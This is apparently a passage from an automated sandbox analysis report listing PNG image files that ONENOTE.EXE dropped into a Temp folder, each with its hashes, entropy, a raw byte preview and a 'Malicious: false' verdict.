SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Temp\{28D05514-0B9F-4BF8-ABCF-7E11DE7D2D90}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{296382FD-8B1D-49BF-ADD9-25F98756DA61}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{29E636F3-342A-4D68-A4EC-8FDF253F3CD5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{2AF9FF9E-A4E2-4EB0-9AD1-162C150879BF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{2BBA2F01-2C8E-49F2-BA8C-F3802DB10D49}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{2BC04888-94BE-4C31-9C3F-E73129D94D16}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{30A6DFE2-6AF1-4B16-B161-3439CCCA09C5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{315543D7-E807-4DE8-9016-00D2BF1F2E17}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Temp\{31A61181-DF5E-4A9E-94AE-F50770EB3E03}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{3206217C-8A5A-416B-8F9B-8AEB16233E3F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{33BF4C9C-13F4-474A-BA78-6850C0D0E4A7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{35B6CE98-A3E2-45D1-9FF9-22D9E13DA0D5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{37C5A43C-27AF-437C-BB45-95CAC2A58312}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{3C128856-01B5-4DC4-BAF2-BC15EE4CD16C}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
